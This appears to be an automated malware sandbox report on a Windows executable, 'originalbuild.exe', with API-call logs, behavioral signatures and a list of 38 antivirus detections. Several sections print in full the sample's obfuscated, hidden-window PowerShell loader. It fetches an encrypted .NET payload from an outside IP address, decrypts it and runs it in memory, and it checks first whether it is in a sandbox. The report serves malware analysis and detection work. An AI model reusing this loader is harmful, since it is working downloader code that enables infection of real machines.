NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f8f1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f8f2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02721000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02563000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02564000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0259c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02583000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02584000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 27, 2023, 9:45 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02588000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('MzU5NjQ=')); $slawsMetrize = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ODNjNjk=')); $outgoOctads = new-object System.Net.Sockets.TcpClient; $outgoOctads.Connect($chigoesTimist, [int]$alfaquiJundies); $slawsOutgo = $outgoOctads.GetStream(); $outgoOctads.SendTimeout = 300000; $outgoOctads.ReceiveTimeout = 300000; $slawsExclaim = [System.Text.StringBuilder]::new(); $slawsExclaim.AppendLine('GET /' + $slawsMetrize); $slawsExclaim.AppendLine('Host: ' + $chigoesTimist); $slawsExclaim.AppendLine(); $slawsVoguish = [System.Text.Encoding]::ASCII.GetBytes($slawsExclaim.ToString()); $slawsOutgo.Write($slawsVoguish, 0, $slawsVoguish.Length); $octadsExclaim = New-Object System.IO.MemoryStream; $slawsOutgo.CopyTo($octadsExclaim); $slawsOutgo.Dispose(); $outgoOctads.Dispose(); $octadsExclaim.Position = 0; $exclaimOctads = $octadsExclaim.ToArray(); $octadsExclaim.Dispose(); $jundiesExclaim = [System.Text.Encoding]::ASCII.GetString($exclaimOctads).IndexOf('`r`n`r`n')+1; $voguishJundies = [System.Text.Encoding]::ASCII.GetString($exclaimOctads[$jundiesExclaim..($exclaimOctads.Length-1)]); $voguishJundies = [System.Convert]::FromBase64String($voguishJundies); $alfaquiSlaws = New-Object System.Security.Cryptography.AesManaged; $alfaquiSlaws.Mode = [System.Security.Cryptography.CipherMode]::CBC; $alfaquiSlaws.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $alfaquiSlaws.Key = [System.Convert]::FromBase64String('HFk5TkL1SWFKf0ttQovZt1j+09jfjjOj6rSlVOK1CGU='); $alfaquiSlaws.IV = [System.Convert]::FromBase64String('34A3btGY/kf2JLl8KGEavg=='); $alfaquiVoguish = $alfaquiSlaws.CreateDecryptor(); $voguishJundies = $alfaquiVoguish.TransformFinalBlock($voguishJundies, 0, $voguishJundies.Length); $alfaquiVoguish.Dispose(); $alfaquiSlaws.Dispose(); $metrizeChigoes = New-Object System.IO.MemoryStream(, $voguishJundies); $alfaquiOctads = New-Object System.IO.MemoryStream; $voguishOutgo = New-Object System.IO.Compression.GZipStream($metrizeChigoes, [IO.Compression.CompressionMode]::Decompress); $voguishOutgo.CopyTo($alfaquiOctads); $voguishJundies = $alfaquiOctads.ToArray(); $metrizeSlaws = [System.Reflection.Assembly]::Load($voguishJundies); $timistVoguish = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b290aGVjYUZsYXdmdWw=')); $outgoTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b2N0YWRzVGltaXN0')); $octadsAlfaqui = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bWV0cml6ZUV4Y2xhaW0=')); $chigoesOctads = $metrizeSlaws.GetType($timistVoguish + '.' + $outgoTimist); $voguishAlfaqui = $chigoesOctads.GetMethod($octadsAlfaqui); $voguishAlfaqui.Invoke($jundiesSlaws, (, [string[]] (''))); #($jundiesSlaws, $jundiesSlaws);

cmdline

C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('MzU5NjQ=')); $slawsMetrize = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ODNjNjk=')); $outgoOctads = new-object System.Net.Sockets.TcpClient; $outgoOctads.Connect($chigoesTimist, [int]$alfaquiJundies); $slawsOutgo = $outgoOctads.GetStream(); $outgoOctads.SendTimeout = 300000; $outgoOctads.ReceiveTimeout = 300000; $slawsExclaim = [System.Text.StringBuilder]::new(); $slawsExclaim.AppendLine('GET /' + $slawsMetrize); $slawsExclaim.AppendLine('Host: ' + $chigoesTimist); $slawsExclaim.AppendLine(); $slawsVoguish = [System.Text.Encoding]::ASCII.GetBytes($slawsExclaim.ToString()); $slawsOutgo.Write($slawsVoguish, 0, $slawsVoguish.Length); $octadsExclaim = New-Object System.IO.MemoryStream; $slawsOutgo.CopyTo($octadsExclaim); $slawsOutgo.Dispose(); $outgoOctads.Dispose(); $octadsExclaim.Position = 0; $exclaimOctads = $octadsExclaim.ToArray(); $octadsExclaim.Dispose(); $jundiesExclaim = [System.Text.Encoding]::ASCII.GetString($exclaimOctads).IndexOf('`r`n`r`n')+1; $voguishJundies = [System.Text.Encoding]::ASCII.GetString($exclaimOctads[$jundiesExclaim..($exclaimOctads.Length-1)]); $voguishJundies = [System.Convert]::FromBase64String($voguishJundies); $alfaquiSlaws = New-Object System.Security.Cryptography.AesManaged; $alfaquiSlaws.Mode = [System.Security.Cryptography.CipherMode]::CBC; $alfaquiSlaws.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $alfaquiSlaws.Key = [System.Convert]::FromBase64String('HFk5TkL1SWFKf0ttQovZt1j+09jfjjOj6rSlVOK1CGU='); $alfaquiSlaws.IV = [System.Convert]::FromBase64String('34A3btGY/kf2JLl8KGEavg=='); $alfaquiVoguish = $alfaquiSlaws.CreateDecryptor(); $voguishJundies = $alfaquiVoguish.TransformFinalBlock($voguishJundies, 0, $voguishJundies.Length); $alfaquiVoguish.Dispose(); $alfaquiSlaws.Dispose(); $metrizeChigoes = New-Object System.IO.MemoryStream(, $voguishJundies); $alfaquiOctads = New-Object System.IO.MemoryStream; $voguishOutgo = New-Object System.IO.Compression.GZipStream($metrizeChigoes, [IO.Compression.CompressionMode]::Decompress); $voguishOutgo.CopyTo($alfaquiOctads); $voguishJundies = $alfaquiOctads.ToArray(); $metrizeSlaws = [System.Reflection.Assembly]::Load($voguishJundies); $timistVoguish = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b290aGVjYUZsYXdmdWw=')); $outgoTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b2N0YWRzVGltaXN0')); $octadsAlfaqui = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bWV0cml6ZUV4Y2xhaW0=')); $chigoesOctads = $metrizeSlaws.GetType($timistVoguish + '.' + $outgoTimist); $voguishAlfaqui = $chigoesOctads.GetMethod($octadsAlfaqui); $voguishAlfaqui.Invoke($jundiesSlaws, (, [string[]] (''))); #($jundiesSlaws, $jundiesSlaws);

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 27, 2023, 9:45 a.m.	thread_identifier: 2084 thread_handle: 0x00000384 process_identifier: 2080 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('MzU5NjQ=')); $slawsMetrize = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ODNjNjk=')); $outgoOctads = new-object System.Net.Sockets.TcpClient; $outgoOctads.Connect($chigoesTimist, [int]$alfaquiJundies); $slawsOutgo = $outgoOctads.GetStream(); $outgoOctads.SendTimeout = 300000; $outgoOctads.ReceiveTimeout = 300000; $slawsExclaim = [System.Text.StringBuilder]::new(); $slawsExclaim.AppendLine('GET /' + $slawsMetrize); $slawsExclaim.AppendLine('Host: ' + $chigoesTimist); $slawsExclaim.AppendLine(); $slawsVoguish = [System.Text.Encoding]::ASCII.GetBytes($slawsExclaim.ToString()); $slawsOutgo.Write($slawsVoguish, 0, $slawsVoguish.Length); $octadsExclaim = New-Object System.IO.MemoryStream; $slawsOutgo.CopyTo($octadsExclaim); $slawsOutgo.Dispose(); $outgoOctads.Dispose(); $octadsExclaim.Position = 0; $exclaimOctads = $octadsExclaim.ToArray(); $octadsExclaim.Dispose(); $jundiesExclaim = [System.Text.Encoding]::ASCII.GetString($exclaimOctads).IndexOf('`r`n`r`n')+1; $voguishJundies = [System.Text.Encoding]::ASCII.GetString($exclaimOctads[$jundiesExclaim..($exclaimOctads.Length-1)]); $voguishJundies = [System.Convert]::FromBase64String($voguishJundies); $alfaquiSlaws = New-Object System.Security.Cryptography.AesManaged; $alfaquiSlaws.Mode = [System.Security.Cryptography.CipherMode]::CBC; $alfaquiSlaws.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $alfaquiSlaws.Key = [System.Convert]::FromBase64String('HFk5TkL1SWFKf0ttQovZt1j+09jfjjOj6rSlVOK1CGU='); $alfaquiSlaws.IV = [System.Convert]::FromBase64String('34A3btGY/kf2JLl8KGEavg=='); $alfaquiVoguish = $alfaquiSlaws.CreateDecryptor(); $voguishJundies = $alfaquiVoguish.TransformFinalBlock($voguishJundies, 0, $voguishJundies.Length); $alfaquiVoguish.Dispose(); $alfaquiSlaws.Dispose(); $metrizeChigoes = New-Object System.IO.MemoryStream(, $voguishJundies); $alfaquiOctads = New-Object System.IO.MemoryStream; $voguishOutgo = New-Object System.IO.Compression.GZipStream($metrizeChigoes, [IO.Compression.CompressionMode]::Decompress); $voguishOutgo.CopyTo($alfaquiOctads); $voguishJundies = $alfaquiOctads.ToArray(); $metrizeSlaws = [System.Reflection.Assembly]::Load($voguishJundies); $timistVoguish = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b290aGVjYUZsYXdmdWw=')); $outgoTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b2N0YWRzVGltaXN0')); $octadsAlfaqui = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bWV0cml6ZUV4Y2xhaW0=')); $chigoesOctads = $metrizeSlaws.GetType($timistVoguish + '.' + $outgoTimist); $voguishAlfaqui = $chigoesOctads.GetMethod($octadsAlfaqui); $voguishAlfaqui.Invoke($jundiesSlaws, (, [string[]] (''))); #($jundiesSlaws, $jundiesSlaws); filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000038c	1	1	0
ShellExecuteExW April 27, 2023, 9:45 a.m.	show_type: 0 filepath_r: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe parameters: -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $chigoesTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $alfaquiJundies = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('MzU5NjQ=')); $slawsMetrize = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ODNjNjk=')); $outgoOctads = new-object System.Net.Sockets.TcpClient; $outgoOctads.Connect($chigoesTimist, [int]$alfaquiJundies); $slawsOutgo = $outgoOctads.GetStream(); $outgoOctads.SendTimeout = 300000; $outgoOctads.ReceiveTimeout = 300000; $slawsExclaim = [System.Text.StringBuilder]::new(); $slawsExclaim.AppendLine('GET /' + $slawsMetrize); $slawsExclaim.AppendLine('Host: ' + $chigoesTimist); $slawsExclaim.AppendLine(); $slawsVoguish = [System.Text.Encoding]::ASCII.GetBytes($slawsExclaim.ToString()); $slawsOutgo.Write($slawsVoguish, 0, $slawsVoguish.Length); $octadsExclaim = New-Object System.IO.MemoryStream; $slawsOutgo.CopyTo($octadsExclaim); $slawsOutgo.Dispose(); $outgoOctads.Dispose(); $octadsExclaim.Position = 0; $exclaimOctads = $octadsExclaim.ToArray(); $octadsExclaim.Dispose(); $jundiesExclaim = [System.Text.Encoding]::ASCII.GetString($exclaimOctads).IndexOf('`r`n`r`n')+1; $voguishJundies = [System.Text.Encoding]::ASCII.GetString($exclaimOctads[$jundiesExclaim..($exclaimOctads.Length-1)]); $voguishJundies = [System.Convert]::FromBase64String($voguishJundies); $alfaquiSlaws = New-Object System.Security.Cryptography.AesManaged; $alfaquiSlaws.Mode = [System.Security.Cryptography.CipherMode]::CBC; $alfaquiSlaws.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $alfaquiSlaws.Key = [System.Convert]::FromBase64String('HFk5TkL1SWFKf0ttQovZt1j+09jfjjOj6rSlVOK1CGU='); $alfaquiSlaws.IV = [System.Convert]::FromBase64String('34A3btGY/kf2JLl8KGEavg=='); $alfaquiVoguish = $alfaquiSlaws.CreateDecryptor(); $voguishJundies = $alfaquiVoguish.TransformFinalBlock($voguishJundies, 0, $voguishJundies.Length); $alfaquiVoguish.Dispose(); $alfaquiSlaws.Dispose(); $metrizeChigoes = New-Object System.IO.MemoryStream(, $voguishJundies); $alfaquiOctads = New-Object System.IO.MemoryStream; $voguishOutgo = New-Object System.IO.Compression.GZipStream($metrizeChigoes, [IO.Compression.CompressionMode]::Decompress); $voguishOutgo.CopyTo($alfaquiOctads); $voguishJundies = $alfaquiOctads.ToArray(); $metrizeSlaws = [System.Reflection.Assembly]::Load($voguishJundies); $timistVoguish = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b290aGVjYUZsYXdmdWw=')); $outgoTimist = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b2N0YWRzVGltaXN0')); $octadsAlfaqui = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bWV0cml6ZUV4Y2xhaW0=')); $chigoesOctads = $metrizeSlaws.GetType($timistVoguish + '.' + $outgoTimist); $voguishAlfaqui = $chigoesOctads.GetMethod($octadsAlfaqui); $voguishAlfaqui.Invoke($jundiesSlaws, (, [string[]] (''))); #($jundiesSlaws, $jundiesSlaws); filepath: C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0002be00', u'virtual_address': u'0x0001e000', u'entropy': 7.173965787692728, u'name': u'.rsrc', u'virtual_size': u'0x0002bc3e'}

entropy

7.17396578769

description

A section with a high entropy has been found

entropy

0.621238938053

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 27, 2023, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 27, 2023, 9:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Terminates another process (1 event)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess April 27, 2023, 9:45 a.m.	status_code: 0x00000001 process_identifier: 884 process_handle: 0x000003a0		0	0

Communicates with host for which no DNS query was performed (1 event)

host

91.215.85.198

Creates a suspicious Powershell process (2 events)

option	-windowstyle hidden				value	Attempts to execute command with a hidden window
option	-windowstyle hidden				value	Attempts to execute command with a hidden window

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Lionic	Trojan.Win32.PsDownload.4!c
MicroWorld-eScan	Trojan.GenericKD.66656979
FireEye	Generic.mg.6bdbea0ec35358cc
McAfee	Artemis!6BDBEA0EC353
Malwarebytes	Backdoor.ShellCode.MSIL
Sangfor	Downloader.Win32.Psdownload.Vfzc
CrowdStrike	win/malicious_confidence_90% (D)
K7GW	Trojan ( 0059cfdb1 )
K7AntiVirus	Trojan ( 0059cfdb1 )
Arcabit	Trojan.Generic.D3F91AD3
Symantec	Trojan.Gen.2
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/Kryptik.AISE
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Downloader.MSIL.PsDownload.gen
BitDefender	Trojan.GenericKD.66656979
Avast	Win32:TrojanX-gen [Trj]
Sophos	Mal/Generic-S
McAfee-GW-Edition	Artemis!Trojan
Emsisoft	Trojan.GenericKD.66656979 (B)
Webroot	W32.Trojan.Gen
Antiy-AVL	Trojan/Win32.Sabsik
Gridinsoft	Ransom.Win32.Sabsik.sa
Microsoft	Trojan:Win32/Casdet!rfn
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.PsDownload.gen
GData	Trojan.GenericKD.66656979
Google	Detected
BitDefenderTheta	Gen:NN.ZemsilF.36164.sm2@a40jl9b
MAX	malware (ai score=84)
Cylance	unsafe
Panda	Trj/Chgt.AD
Rising	Downloader.PsDownload!8.E547 (CLOUD)
Ikarus	Trojan.MSIL.Crypt
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	PossibleThreat
AVG	Win32:TrojanX-gen [Trj]
DeepInstinct	MALICIOUS

originalbuild.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All